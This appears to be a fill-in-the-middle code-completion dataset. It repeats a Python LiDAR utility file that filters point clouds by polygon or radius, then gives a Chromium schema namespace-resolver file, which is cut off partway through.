x,y,inside = points_in_radius(in_pts[:,0],in_pts[:,1],target_xy[0],target_xy[1],radius)
pts = in_pts[inside,:]
else:
print( "\t\t\t no points in neighbourhood")
return pts
<|fim▁end|> | print("\t\t\t no points in polygon") |
<|file_name|>LiDAR_tools.py<|end_file_name|><|fim▁begin|>import numpy as np
import laspy as las
# Determine if a point is inside a given polygon or not
# Polygon is a list of (x,y) pairs. This function
# returns True or False. The algorithm is called
# the "Ray Casting Method".
# the point_in_poly algorithm was found here:
# http://geospatialpython.com/2011/01/point-in-polygon.html
def point_in_poly(x,y,poly):
n = len(poly)
inside = False
p1x,p1y = poly[0]
for i in range(n+1):
p2x,p2y = poly[i % n]
if y > min(p1y,p2y):
if y <= max(p1y,p2y):
if x <= max(p1x,p2x):
if p1y != p2y:
xints = (y-p1y)*(p2x-p1x)/(p2y-p1y)+p1x
if p1x == p2x or x <= xints:
inside = not inside
p1x,p1y = p2x,p2y
return inside
# This is my own version of the ray-casting algorithm. It uses numpy arrays so that a list of x and y coordinates can be processed in one call, and only the points inside the polygon are returned, together with a boolean mask over the inputs in case it is needed for future referencing. This saves a fair bit of looping.
def points_in_poly(x,y,poly):
n = len(poly)
inside=np.zeros(x.size,dtype=bool)
xints=np.zeros(x.size)
p1x,p1y = poly[0]
for i in range(n+1):
p2x,p2y=poly[i % n]
if p1y!=p2y:
xints[np.all([y>min(p1y,p2y), y<=max(p1y,p2y), x<=max(p1x,p2x)],axis=0)] = (y[np.all([y>min(p1y,p2y), y<=max(p1y,p2y), x<=max(p1x,p2x)],axis=0)]-p1y)*(p2x-p1x)/(p2y-p1y)+p1x
if p1x==p2x:
inside[np.all([y>min(p1y,p2y), y<=max(p1y,p2y), x<=max(p1x,p2x)],axis=0)] = np.invert(inside[np.all([y>min(p1y,p2y), y<=max(p1y,p2y), x<=max(p1x,p2x)],axis=0)])
else:
inside[np.all([y>min(p1y,p2y), y<=max(p1y,p2y), x<=max(p1x,p2x),x<=xints],axis=0)] = np.invert(inside[np.all([y>min(p1y,p2y), y<=max(p1y,p2y), x<=max(p1x,p2x),x<=xints],axis=0)])
p1x,p1y = p2x,p2y
return x[inside],y[inside], inside
# This retrieves all points within a circular neighbourhood. The target point is the location around which the neighbourhood search is conducted, for a specified search radius. x and y are vectors with the x and y coordinates of the test points.
def points_in_radius(x,y,target_x, target_y,radius):
inside=np.zeros(x.size,dtype=bool)
d2=(x-target_x)**2+(y-target_y)**2
inside = d2<=radius**2
return x[inside],y[inside], inside
# filter lidar with polygon
# This function has been updated to include an option to filter by first return location.
# The reason for this is so full collections of returns associated with each LiDAR pulse
# can be retrieved, which can be an issue at edges in multi-return analyses
def filter_lidar_data_by_polygon(in_pts,polygon,filter_by_first_return_location = False):
pts = np.zeros((0,in_pts.shape[1]))
if in_pts.shape[0]>0:
if filter_by_first_return_location:
# find first returns
mask = in_pts[:,3]==1
x_temp, y_temp, inside_temp = points_in_poly(in_pts[mask,0],in_pts[mask,1],polygon)
shots = np.unique(in_pts[mask,6][inside_temp]) # index 6 refers to GPS time
inside = np.in1d(in_pts[:,6],shots) # this function retrieves all points corresponding to this GPS time
x = in_pts[inside,0]
y = in_pts[inside,1]
x_temp=None
y_temp=None
inside_temp=None
else:
x,y,inside = points_in_poly(in_pts[:,0],in_pts[:,1],polygon)
pts = in_pts[inside,:]
else:
print("\t\t\t no points in polygon")
return pts
# filter lidar by circular neighbourhood
def filter_lidar_data_by_neighbourhood(in_pts,target_xy,radius):
pts = np.zeros((0,in_pts.shape[1]))
if in_pts.shape[0]>0:
<|fim_middle|>
else:
print( "\t\t\t no points in neighbourhood")
return pts
<|fim▁end|> | x,y,inside = points_in_radius(in_pts[:,0],in_pts[:,1],target_xy[0],target_xy[1],radius)
pts = in_pts[inside,:] |
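A usage sketch for the circular-neighbourhood filter above, assuming the file is importable as LiDAR_tools; the three-column (x, y, z) layout of the synthetic points is an assumption, since only columns 0 and 1 are read:

import numpy as np
from LiDAR_tools import filter_lidar_data_by_neighbourhood

pts = np.array([[0.0, 0.0, 10.0],   # at the target point, kept
                [3.0, 4.0, 12.0],   # distance 5 from the target, kept because d <= radius
                [6.0, 8.0, 11.0]])  # distance 10 from the target, dropped
near = filter_lidar_data_by_neighbourhood(pts, target_xy=[0.0, 0.0], radius=5.0)
print(near.shape[0])  # expected 2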
<|file_name|>LiDAR_tools.py<|end_file_name|><|fim▁begin|>import numpy as np
import laspy as las
# Determine if a point is inside a given polygon or not
# Polygon is a list of (x,y) pairs. This function
# returns True or False. The algorithm is called
# the "Ray Casting Method".
# the point_in_poly algorithm was found here:
# http://geospatialpython.com/2011/01/point-in-polygon.html
def point_in_poly(x,y,poly):
n = len(poly)
inside = False
p1x,p1y = poly[0]
for i in range(n+1):
p2x,p2y = poly[i % n]
if y > min(p1y,p2y):
if y <= max(p1y,p2y):
if x <= max(p1x,p2x):
if p1y != p2y:
xints = (y-p1y)*(p2x-p1x)/(p2y-p1y)+p1x
if p1x == p2x or x <= xints:
inside = not inside
p1x,p1y = p2x,p2y
return inside
# This is my own version of the ray-casting algorithm. It uses numpy arrays so that a list of x and y coordinates can be processed in one call, and only the points inside the polygon are returned, together with a boolean mask over the inputs in case it is needed for future referencing. This saves a fair bit of looping.
def points_in_poly(x,y,poly):
n = len(poly)
inside=np.zeros(x.size,dtype=bool)
xints=np.zeros(x.size)
p1x,p1y = poly[0]
for i in range(n+1):
p2x,p2y=poly[i % n]
if p1y!=p2y:
xints[np.all([y>min(p1y,p2y), y<=max(p1y,p2y), x<=max(p1x,p2x)],axis=0)] = (y[np.all([y>min(p1y,p2y), y<=max(p1y,p2y), x<=max(p1x,p2x)],axis=0)]-p1y)*(p2x-p1x)/(p2y-p1y)+p1x
if p1x==p2x:
inside[np.all([y>min(p1y,p2y), y<=max(p1y,p2y), x<=max(p1x,p2x)],axis=0)] = np.invert(inside[np.all([y>min(p1y,p2y), y<=max(p1y,p2y), x<=max(p1x,p2x)],axis=0)])
else:
inside[np.all([y>min(p1y,p2y), y<=max(p1y,p2y), x<=max(p1x,p2x),x<=xints],axis=0)] = np.invert(inside[np.all([y>min(p1y,p2y), y<=max(p1y,p2y), x<=max(p1x,p2x),x<=xints],axis=0)])
p1x,p1y = p2x,p2y
return x[inside],y[inside], inside
# This retrieves all points within a circular neighbourhood. The target point is the location around which the neighbourhood search is conducted, for a specified search radius. x and y are vectors with the x and y coordinates of the test points.
def points_in_radius(x,y,target_x, target_y,radius):
inside=np.zeros(x.size,dtype=bool)
d2=(x-target_x)**2+(y-target_y)**2
inside = d2<=radius**2
return x[inside],y[inside], inside
# filter lidar with polygon
# This function has been updated to include an option to filter by first return location.
# The reason for this is so full collections of returns associated with each LiDAR pulse
# can be retrieved, which can be an issue at edges in multi-return analyses
def filter_lidar_data_by_polygon(in_pts,polygon,filter_by_first_return_location = False):
pts = np.zeros((0,in_pts.shape[1]))
if in_pts.shape[0]>0:
if filter_by_first_return_location:
# find first returns
mask = in_pts[:,3]==1
x_temp, y_temp, inside_temp = points_in_poly(in_pts[mask,0],in_pts[mask,1],polygon)
shots = np.unique(in_pts[mask,6][inside_temp]) # index 6 refers to GPS time
inside = np.in1d(in_pts[:,6],shots) # this function retrieves all points corresponding to this GPS time
x = in_pts[inside,0]
y = in_pts[inside,1]
x_temp=None
y_temp=None
inside_temp=None
else:
x,y,inside = points_in_poly(in_pts[:,0],in_pts[:,1],polygon)
pts = in_pts[inside,:]
else:
print("\t\t\t no points in polygon")
return pts
# filter lidar by circular neighbourhood
def filter_lidar_data_by_neighbourhood(in_pts,target_xy,radius):
pts = np.zeros((0,in_pts.shape[1]))
if in_pts.shape[0]>0:
x,y,inside = points_in_radius(in_pts[:,0],in_pts[:,1],target_xy[0],target_xy[1],radius)
pts = in_pts[inside,:]
else:
<|fim_middle|>
return pts
<|fim▁end|> | print( "\t\t\t no points in neighbourhood") |
<|file_name|>LiDAR_tools.py<|end_file_name|><|fim▁begin|>import numpy as np
import laspy as las
# Determine if a point is inside a given polygon or not
# Polygon is a list of (x,y) pairs. This function
# returns True or False. The algorithm is called
# the "Ray Casting Method".
# the point_in_poly algorithm was found here:
# http://geospatialpython.com/2011/01/point-in-polygon.html
def <|fim_middle|>(x,y,poly):
n = len(poly)
inside = False
p1x,p1y = poly[0]
for i in range(n+1):
p2x,p2y = poly[i % n]
if y > min(p1y,p2y):
if y <= max(p1y,p2y):
if x <= max(p1x,p2x):
if p1y != p2y:
xints = (y-p1y)*(p2x-p1x)/(p2y-p1y)+p1x
if p1x == p2x or x <= xints:
inside = not inside
p1x,p1y = p2x,p2y
return inside
# This is my own version of the ray-casting algorithm. It uses numpy arrays so that a list of x and y coordinates can be processed in one call, and only the points inside the polygon are returned, together with a boolean mask over the inputs in case it is needed for future referencing. This saves a fair bit of looping.
def points_in_poly(x,y,poly):
n = len(poly)
inside=np.zeros(x.size,dtype=bool)
xints=np.zeros(x.size)
p1x,p1y = poly[0]
for i in range(n+1):
p2x,p2y=poly[i % n]
if p1y!=p2y:
xints[np.all([y>min(p1y,p2y), y<=max(p1y,p2y), x<=max(p1x,p2x)],axis=0)] = (y[np.all([y>min(p1y,p2y), y<=max(p1y,p2y), x<=max(p1x,p2x)],axis=0)]-p1y)*(p2x-p1x)/(p2y-p1y)+p1x
if p1x==p2x:
inside[np.all([y>min(p1y,p2y), y<=max(p1y,p2y), x<=max(p1x,p2x)],axis=0)] = np.invert(inside[np.all([y>min(p1y,p2y), y<=max(p1y,p2y), x<=max(p1x,p2x)],axis=0)])
else:
inside[np.all([y>min(p1y,p2y), y<=max(p1y,p2y), x<=max(p1x,p2x),x<=xints],axis=0)] = np.invert(inside[np.all([y>min(p1y,p2y), y<=max(p1y,p2y), x<=max(p1x,p2x),x<=xints],axis=0)])
p1x,p1y = p2x,p2y
return x[inside],y[inside], inside
# This retrieves all points within a circular neighbourhood. The target point is the location around which the neighbourhood search is conducted, for a specified search radius. x and y are vectors with the x and y coordinates of the test points.
def points_in_radius(x,y,target_x, target_y,radius):
inside=np.zeros(x.size,dtype=bool)
d2=(x-target_x)**2+(y-target_y)**2
inside = d2<=radius**2
return x[inside],y[inside], inside
# filter lidar with polygon
# This function has been updated to include an option to filter by first return location.
# The reason for this is so full collections of returns associated with each LiDAR pulse
# can be retrieved, which can be an issue at edges in multi-return analyses
def filter_lidar_data_by_polygon(in_pts,polygon,filter_by_first_return_location = False):
pts = np.zeros((0,in_pts.shape[1]))
if in_pts.shape[0]>0:
if filter_by_first_return_location:
# find first returns
mask = in_pts[:,3]==1
x_temp, y_temp, inside_temp = points_in_poly(in_pts[mask,0],in_pts[mask,1],polygon)
shots = np.unique(in_pts[mask,6][inside_temp]) # index 6 refers to GPS time
inside = np.in1d(in_pts[:,6],shots) # this function retrieves all points corresponding to this GPS time
x = in_pts[inside,0]
y = in_pts[inside,1]
x_temp=None
y_temp=None
inside_temp=None
else:
x,y,inside = points_in_poly(in_pts[:,0],in_pts[:,1],polygon)
pts = in_pts[inside,:]
else:
print("\t\t\t no points in polygon")
return pts
# filter lidar by circular neighbourhood
def filter_lidar_data_by_neighbourhood(in_pts,target_xy,radius):
pts = np.zeros((0,in_pts.shape[1]))
if in_pts.shape[0]>0:
x,y,inside = points_in_radius(in_pts[:,0],in_pts[:,1],target_xy[0],target_xy[1],radius)
pts = in_pts[inside,:]
else:
print( "\t\t\t no points in neighbourhood")
return pts
<|fim▁end|> | point_in_poly |
<|file_name|>LiDAR_tools.py<|end_file_name|><|fim▁begin|>import numpy as np
import laspy as las
# Determine if a point is inside a given polygon or not
# Polygon is a list of (x,y) pairs. This function
# returns True or False. The algorithm is called
# the "Ray Casting Method".
# the point_in_poly algorithm was found here:
# http://geospatialpython.com/2011/01/point-in-polygon.html
def point_in_poly(x,y,poly):
n = len(poly)
inside = False
p1x,p1y = poly[0]
for i in range(n+1):
p2x,p2y = poly[i % n]
if y > min(p1y,p2y):
if y <= max(p1y,p2y):
if x <= max(p1x,p2x):
if p1y != p2y:
xints = (y-p1y)*(p2x-p1x)/(p2y-p1y)+p1x
if p1x == p2x or x <= xints:
inside = not inside
p1x,p1y = p2x,p2y
return inside
# This is my own version of the ray-casting algorithm. It uses numpy arrays so that a list of x and y coordinates can be processed in one call, and only the points inside the polygon are returned, together with a boolean mask over the inputs in case it is needed for future referencing. This saves a fair bit of looping.
def <|fim_middle|>(x,y,poly):
n = len(poly)
inside=np.zeros(x.size,dtype=bool)
xints=np.zeros(x.size)
p1x,p1y = poly[0]
for i in range(n+1):
p2x,p2y=poly[i % n]
if p1y!=p2y:
xints[np.all([y>min(p1y,p2y), y<=max(p1y,p2y), x<=max(p1x,p2x)],axis=0)] = (y[np.all([y>min(p1y,p2y), y<=max(p1y,p2y), x<=max(p1x,p2x)],axis=0)]-p1y)*(p2x-p1x)/(p2y-p1y)+p1x
if p1x==p2x:
inside[np.all([y>min(p1y,p2y), y<=max(p1y,p2y), x<=max(p1x,p2x)],axis=0)] = np.invert(inside[np.all([y>min(p1y,p2y), y<=max(p1y,p2y), x<=max(p1x,p2x)],axis=0)])
else:
inside[np.all([y>min(p1y,p2y), y<=max(p1y,p2y), x<=max(p1x,p2x),x<=xints],axis=0)] = np.invert(inside[np.all([y>min(p1y,p2y), y<=max(p1y,p2y), x<=max(p1x,p2x),x<=xints],axis=0)])
p1x,p1y = p2x,p2y
return x[inside],y[inside], inside
# This retrieves all points within a circular neighbourhood. The target point is the location around which the neighbourhood search is conducted, for a specified search radius. x and y are vectors with the x and y coordinates of the test points.
def points_in_radius(x,y,target_x, target_y,radius):
inside=np.zeros(x.size,dtype=bool)
d2=(x-target_x)**2+(y-target_y)**2
inside = d2<=radius**2
return x[inside],y[inside], inside
# filter lidar with polygon
# This function has been updated to include an option to filter by first return location.
# The reason for this is so full collections of returns associated with each LiDAR pulse
# can be retrieved, which can be an issue at edges in multi-return analyses
def filter_lidar_data_by_polygon(in_pts,polygon,filter_by_first_return_location = False):
pts = np.zeros((0,in_pts.shape[1]))
if in_pts.shape[0]>0:
if filter_by_first_return_location:
# find first returns
mask = in_pts[:,3]==1
x_temp, y_temp, inside_temp = points_in_poly(in_pts[mask,0],in_pts[mask,1],polygon)
shots = np.unique(in_pts[mask,6][inside_temp]) # index 6 refers to GPS time
inside = np.in1d(in_pts[:,6],shots) # this function retrieves all points corresponding to this GPS time
x = in_pts[inside,0]
y = in_pts[inside,1]
x_temp=None
y_temp=None
inside_temp=None
else:
x,y,inside = points_in_poly(in_pts[:,0],in_pts[:,1],polygon)
pts = in_pts[inside,:]
else:
print("\t\t\t no points in polygon")
return pts
# filter lidar by circular neighbourhood
def filter_lidar_data_by_neighbourhood(in_pts,target_xy,radius):
pts = np.zeros((0,in_pts.shape[1]))
if in_pts.shape[0]>0:
x,y,inside = points_in_radius(in_pts[:,0],in_pts[:,1],target_xy[0],target_xy[1],radius)
pts = in_pts[inside,:]
else:
print( "\t\t\t no points in neighbourhood")
return pts
<|fim▁end|> | points_in_poly |
<|file_name|>LiDAR_tools.py<|end_file_name|><|fim▁begin|>import numpy as np
import laspy as las
# Determine if a point is inside a given polygon or not
# Polygon is a list of (x,y) pairs. This function
# returns True or False. The algorithm is called
# the "Ray Casting Method".
# the point_in_poly algorithm was found here:
# http://geospatialpython.com/2011/01/point-in-polygon.html
def point_in_poly(x,y,poly):
n = len(poly)
inside = False
p1x,p1y = poly[0]
for i in range(n+1):
p2x,p2y = poly[i % n]
if y > min(p1y,p2y):
if y <= max(p1y,p2y):
if x <= max(p1x,p2x):
if p1y != p2y:
xints = (y-p1y)*(p2x-p1x)/(p2y-p1y)+p1x
if p1x == p2x or x <= xints:
inside = not inside
p1x,p1y = p2x,p2y
return inside
# This is my own version of the ray-casting algorithm. It uses numpy arrays so that a list of x and y coordinates can be processed in one call, and only the points inside the polygon are returned, together with a boolean mask over the inputs in case it is needed for future referencing. This saves a fair bit of looping.
def points_in_poly(x,y,poly):
n = len(poly)
inside=np.zeros(x.size,dtype=bool)
xints=np.zeros(x.size)
p1x,p1y = poly[0]
for i in range(n+1):
p2x,p2y=poly[i % n]
if p1y!=p2y:
xints[np.all([y>min(p1y,p2y), y<=max(p1y,p2y), x<=max(p1x,p2x)],axis=0)] = (y[np.all([y>min(p1y,p2y), y<=max(p1y,p2y), x<=max(p1x,p2x)],axis=0)]-p1y)*(p2x-p1x)/(p2y-p1y)+p1x
if p1x==p2x:
inside[np.all([y>min(p1y,p2y), y<=max(p1y,p2y), x<=max(p1x,p2x)],axis=0)] = np.invert(inside[np.all([y>min(p1y,p2y), y<=max(p1y,p2y), x<=max(p1x,p2x)],axis=0)])
else:
inside[np.all([y>min(p1y,p2y), y<=max(p1y,p2y), x<=max(p1x,p2x),x<=xints],axis=0)] = np.invert(inside[np.all([y>min(p1y,p2y), y<=max(p1y,p2y), x<=max(p1x,p2x),x<=xints],axis=0)])
p1x,p1y = p2x,p2y
return x[inside],y[inside], inside
# This retrieves all points within a circular neighbourhood. The target point is the location around which the neighbourhood search is conducted, for a specified search radius. x and y are vectors with the x and y coordinates of the test points.
def <|fim_middle|>(x,y,target_x, target_y,radius):
inside=np.zeros(x.size,dtype=bool)
d2=(x-target_x)**2+(y-target_y)**2
inside = d2<=radius**2
return x[inside],y[inside], inside
# filter lidar with polygon
# This function has been updated to include an option to filter by first return location.
# The reason for this is so full collections of returns associated with each LiDAR pulse
# can be retrieved, which can be an issue at edges in multi-return analyses
def filter_lidar_data_by_polygon(in_pts,polygon,filter_by_first_return_location = False):
pts = np.zeros((0,in_pts.shape[1]))
if in_pts.shape[0]>0:
if filter_by_first_return_location:
# find first returns
mask = in_pts[:,3]==1
x_temp, y_temp, inside_temp = points_in_poly(in_pts[mask,0],in_pts[mask,1],polygon)
shots = np.unique(in_pts[mask,6][inside_temp]) # index 6 refers to GPS time
inside = np.in1d(in_pts[:,6],shots) # this function retrieves all points corresponding to this GPS time
x = in_pts[inside,0]
y = in_pts[inside,1]
x_temp=None
y_temp=None
inside_temp=None
else:
x,y,inside = points_in_poly(in_pts[:,0],in_pts[:,1],polygon)
pts = in_pts[inside,:]
else:
print("\t\t\t no points in polygon")
return pts
# filter lidar by circular neighbourhood
def filter_lidar_data_by_neighbourhood(in_pts,target_xy,radius):
pts = np.zeros((0,in_pts.shape[1]))
if in_pts.shape[0]>0:
x,y,inside = points_in_radius(in_pts[:,0],in_pts[:,1],target_xy[0],target_xy[1],radius)
pts = in_pts[inside,:]
else:
print( "\t\t\t no points in neighbourhood")
return pts
<|fim▁end|> | points_in_radius |
<|file_name|>LiDAR_tools.py<|end_file_name|><|fim▁begin|>import numpy as np
import laspy as las
# Determine if a point is inside a given polygon or not
# Polygon is a list of (x,y) pairs. This function
# returns True or False. The algorithm is called
# the "Ray Casting Method".
# the point_in_poly algorithm was found here:
# http://geospatialpython.com/2011/01/point-in-polygon.html
def point_in_poly(x,y,poly):
n = len(poly)
inside = False
p1x,p1y = poly[0]
for i in range(n+1):
p2x,p2y = poly[i % n]
if y > min(p1y,p2y):
if y <= max(p1y,p2y):
if x <= max(p1x,p2x):
if p1y != p2y:
xints = (y-p1y)*(p2x-p1x)/(p2y-p1y)+p1x
if p1x == p2x or x <= xints:
inside = not inside
p1x,p1y = p2x,p2y
return inside
# This is my own version of the ray-casting algorithm. It uses numpy arrays so that a list of x and y coordinates can be processed in one call, and only the points inside the polygon are returned, together with a boolean mask over the inputs in case it is needed for future referencing. This saves a fair bit of looping.
def points_in_poly(x,y,poly):
n = len(poly)
inside=np.zeros(x.size,dtype=bool)
xints=np.zeros(x.size)
p1x,p1y = poly[0]
for i in range(n+1):
p2x,p2y=poly[i % n]
if p1y!=p2y:
xints[np.all([y>min(p1y,p2y), y<=max(p1y,p2y), x<=max(p1x,p2x)],axis=0)] = (y[np.all([y>min(p1y,p2y), y<=max(p1y,p2y), x<=max(p1x,p2x)],axis=0)]-p1y)*(p2x-p1x)/(p2y-p1y)+p1x
if p1x==p2x:
inside[np.all([y>min(p1y,p2y), y<=max(p1y,p2y), x<=max(p1x,p2x)],axis=0)] = np.invert(inside[np.all([y>min(p1y,p2y), y<=max(p1y,p2y), x<=max(p1x,p2x)],axis=0)])
else:
inside[np.all([y>min(p1y,p2y), y<=max(p1y,p2y), x<=max(p1x,p2x),x<=xints],axis=0)] = np.invert(inside[np.all([y>min(p1y,p2y), y<=max(p1y,p2y), x<=max(p1x,p2x),x<=xints],axis=0)])
p1x,p1y = p2x,p2y
return x[inside],y[inside], inside
# This retrieves all points within a circular neighbourhood. The target point is the location around which the neighbourhood search is conducted, for a specified search radius. x and y are vectors with the x and y coordinates of the test points.
def points_in_radius(x,y,target_x, target_y,radius):
inside=np.zeros(x.size,dtype=bool)
d2=(x-target_x)**2+(y-target_y)**2
inside = d2<=radius**2
return x[inside],y[inside], inside
# filter lidar with polygon
# This function has been updated to include an option to filter by first return location.
# The reason for this is so full collections of returns associated with each LiDAR pulse
# can be retrieved, which can be an issue at edges in multi-return analyses
def <|fim_middle|>(in_pts,polygon,filter_by_first_return_location = False):
pts = np.zeros((0,in_pts.shape[1]))
if in_pts.shape[0]>0:
if filter_by_first_return_location:
# find first returns
mask = in_pts[:,3]==1
x_temp, y_temp, inside_temp = points_in_poly(in_pts[mask,0],in_pts[mask,1],polygon)
shots = np.unique(in_pts[mask,6][inside_temp]) # index 6 refers to GPS time
inside = np.in1d(in_pts[:,6],shots) # this function retrieves all points corresponding to this GPS time
x = in_pts[inside,0]
y = in_pts[inside,1]
x_temp=None
y_temp=None
inside_temp=None
else:
x,y,inside = points_in_poly(in_pts[:,0],in_pts[:,1],polygon)
pts = in_pts[inside,:]
else:
print("\t\t\t no points in polygon")
return pts
# filter lidar by circular neighbourhood
def filter_lidar_data_by_neighbourhood(in_pts,target_xy,radius):
pts = np.zeros((0,in_pts.shape[1]))
if in_pts.shape[0]>0:
x,y,inside = points_in_radius(in_pts[:,0],in_pts[:,1],target_xy[0],target_xy[1],radius)
pts = in_pts[inside,:]
else:
print( "\t\t\t no points in neighbourhood")
return pts
<|fim▁end|> | filter_lidar_data_by_polygon |
<|file_name|>LiDAR_tools.py<|end_file_name|><|fim▁begin|>import numpy as np
import laspy as las
# Determine if a point is inside a given polygon or not
# Polygon is a list of (x,y) pairs. This function
# returns True or False. The algorithm is called
# the "Ray Casting Method".
# the point_in_poly algorithm was found here:
# http://geospatialpython.com/2011/01/point-in-polygon.html
def point_in_poly(x,y,poly):
n = len(poly)
inside = False
p1x,p1y = poly[0]
for i in range(n+1):
p2x,p2y = poly[i % n]
if y > min(p1y,p2y):
if y <= max(p1y,p2y):
if x <= max(p1x,p2x):
if p1y != p2y:
xints = (y-p1y)*(p2x-p1x)/(p2y-p1y)+p1x
if p1x == p2x or x <= xints:
inside = not inside
p1x,p1y = p2x,p2y
return inside
# This is my own version of the ray-casting algorithm. It uses numpy arrays so that a list of x and y coordinates can be processed in one call, and only the points inside the polygon are returned, together with a boolean mask over the inputs in case it is needed for future referencing. This saves a fair bit of looping.
def points_in_poly(x,y,poly):
n = len(poly)
inside=np.zeros(x.size,dtype=bool)
xints=np.zeros(x.size)
p1x,p1y = poly[0]
for i in range(n+1):
p2x,p2y=poly[i % n]
if p1y!=p2y:
xints[np.all([y>min(p1y,p2y), y<=max(p1y,p2y), x<=max(p1x,p2x)],axis=0)] = (y[np.all([y>min(p1y,p2y), y<=max(p1y,p2y), x<=max(p1x,p2x)],axis=0)]-p1y)*(p2x-p1x)/(p2y-p1y)+p1x
if p1x==p2x:
inside[np.all([y>min(p1y,p2y), y<=max(p1y,p2y), x<=max(p1x,p2x)],axis=0)] = np.invert(inside[np.all([y>min(p1y,p2y), y<=max(p1y,p2y), x<=max(p1x,p2x)],axis=0)])
else:
inside[np.all([y>min(p1y,p2y), y<=max(p1y,p2y), x<=max(p1x,p2x),x<=xints],axis=0)] = np.invert(inside[np.all([y>min(p1y,p2y), y<=max(p1y,p2y), x<=max(p1x,p2x),x<=xints],axis=0)])
p1x,p1y = p2x,p2y
return x[inside],y[inside], inside
# This retrieves all points within a circular neighbourhood. The target point is the location around which the neighbourhood search is conducted, for a specified search radius. x and y are vectors with the x and y coordinates of the test points.
def points_in_radius(x,y,target_x, target_y,radius):
inside=np.zeros(x.size,dtype=bool)
d2=(x-target_x)**2+(y-target_y)**2
inside = d2<=radius**2
return x[inside],y[inside], inside
# filter lidar with polygon
# This function has been updated to include an option to filter by first return location.
# The reason for this is so full collections of returns associated with each LiDAR pulse
# can be retrieved, which can be an issue at edges in multi-return analyses
def filter_lidar_data_by_polygon(in_pts,polygon,filter_by_first_return_location = False):
pts = np.zeros((0,in_pts.shape[1]))
if in_pts.shape[0]>0:
if filter_by_first_return_location:
# find first returns
mask = in_pts[:,3]==1
x_temp, y_temp, inside_temp = points_in_poly(in_pts[mask,0],in_pts[mask,1],polygon)
shots = np.unique(in_pts[mask,6][inside_temp]) # index 6 refers to GPS time
inside = np.in1d(in_pts[:,6],shots) # this function retrieves all points corresponding to this GPS time
x = in_pts[inside,0]
y = in_pts[inside,1]
x_temp=None
y_temp=None
inside_temp=None
else:
x,y,inside = points_in_poly(in_pts[:,0],in_pts[:,1],polygon)
pts = in_pts[inside,:]
else:
print("\t\t\t no points in polygon")
return pts
# filter lidar by circular neighbourhood
def <|fim_middle|>(in_pts,target_xy,radius):
pts = np.zeros((0,in_pts.shape[1]))
if in_pts.shape[0]>0:
x,y,inside = points_in_radius(in_pts[:,0],in_pts[:,1],target_xy[0],target_xy[1],radius)
pts = in_pts[inside,:]
else:
print( "\t\t\t no points in neighbourhood")
return pts
<|fim▁end|> | filter_lidar_data_by_neighbourhood |
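A sketch of the polygon filter above showing the effect of filter_by_first_return_location, assuming the file is importable as LiDAR_tools. The seven-column point layout is assumed for illustration: the function only reads columns 0 (x), 1 (y), 3 (return number) and 6 (GPS time), and the remaining columns are placeholders:

import numpy as np
from LiDAR_tools import filter_lidar_data_by_polygon

# columns: x, y, z, return number, placeholder, placeholder, GPS time
pts = np.array([
    [0.5, 0.5, 20.0, 1, 0, 0, 100.0],   # first return of pulse 100, inside the square
    [1.4, 0.6,  2.0, 2, 0, 0, 100.0],   # second return of pulse 100, outside the square
    [5.0, 5.0, 15.0, 1, 0, 0, 101.0],   # first return of pulse 101, outside the square
])
square = [(0.0, 0.0), (1.0, 0.0), (1.0, 1.0), (0.0, 1.0)]

print(filter_lidar_data_by_polygon(pts, square).shape[0])  # expected 1: plain point-in-polygon test
print(filter_lidar_data_by_polygon(pts, square,
                                   filter_by_first_return_location=True).shape[0])
# expected 2: every return of the pulse whose first return fell inside the polygon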
<|file_name|>namespace_resolver.py<|end_file_name|><|fim▁begin|># Copyright 2016 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import os
from cpp_namespace_environment import CppNamespaceEnvironment
from model import Model, UnixName
from schema_loader import SchemaLoader
def _GenerateFilenames(full_namespace):
# Try to find the file defining the namespace. E.g. for
# 'nameSpace.sub_name_space.Type' the following heuristic looks for:
# 1. name_space_sub_name_space.json,
# 2. name_space_sub_name_space.idl,
# 3. sub_name_space.json,
# 4. sub_name_space.idl,
# 5. etc.
sub_namespaces = full_namespace.split('.')
filenames = [ ]
basename = None
for namespace in reversed(sub_namespaces):
if basename is not None:
basename = UnixName(namespace + '.' + basename)
else:
basename = UnixName(namespace)
for ext in ['json', 'idl']:
filenames.append('%s.%s' % (basename, ext))
return filenames
class NamespaceResolver(object):
'''Resolves a type name into the namespace the type belongs to.
- |root| path to the root directory.
- |path| path to the directory with the API header files, relative to the
root.
- |include_rules| List containing tuples with (path, cpp_namespace_pattern)
used when searching for types.
- |cpp_namespace_pattern| Default namespace pattern
'''
def __init__(self, root, path, include_rules, cpp_namespace_pattern):
self._root = root
self._include_rules = [(path, cpp_namespace_pattern)] + include_rules
def ResolveNamespace(self, full_namespace):
'''Returns the model.Namespace object associated with the |full_namespace|,
or None if one can't be found.
'''
filenames = _GenerateFilenames(full_namespace)
for path, cpp_namespace in self._include_rules:
cpp_namespace_environment = None
if cpp_namespace:
cpp_namespace_environment = CppNamespaceEnvironment(cpp_namespace)
for filename in reversed(filenames):
filepath = os.path.join(path, filename);<|fim▁hole|> schema = SchemaLoader(self._root).LoadSchema(filepath)[0]
return Model().AddNamespace(
schema,
filepath,
environment=cpp_namespace_environment)
return None
def ResolveType(self, full_name, default_namespace):
'''Returns the model.Namespace object where the type with the given
|full_name| is defined, or None if one can't be found.
'''
name_parts = full_name.rsplit('.', 1)
if len(name_parts) == 1:
if full_name not in default_namespace.types:
return None
return default_namespace
full_namespace, type_name = full_name.rsplit('.', 1)
namespace = self.ResolveNamespace(full_namespace)
if namespace and type_name in namespace.types:
return namespace
return None<|fim▁end|> | if os.path.exists(os.path.join(self._root, filepath)): |
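A worked example of the filename heuristic above, assuming model.UnixName performs the usual lowerCamelCase to unix_hacker_style conversion used by the Chromium JSON schema compiler and that the surrounding modules are importable; the namespace string is illustrative:

from namespace_resolver import _GenerateFilenames  # module name taken from the file header above

names = _GenerateFilenames('nameSpace.subNameSpace')
# The least specific candidates come first in the returned list; ResolveNamespace
# walks it with reversed(), so the most specific file is tried first.
print(names)
# expected (under the assumption above):
# ['sub_name_space.json', 'sub_name_space.idl',
#  'name_space_sub_name_space.json', 'name_space_sub_name_space.idl']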
<|file_name|>namespace_resolver.py<|end_file_name|><|fim▁begin|># Copyright 2016 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import os
from cpp_namespace_environment import CppNamespaceEnvironment
from model import Model, UnixName
from schema_loader import SchemaLoader
def _GenerateFilenames(full_namespace):
# Try to find the file defining the namespace. E.g. for
# 'nameSpace.sub_name_space.Type' the following heuristic looks for:
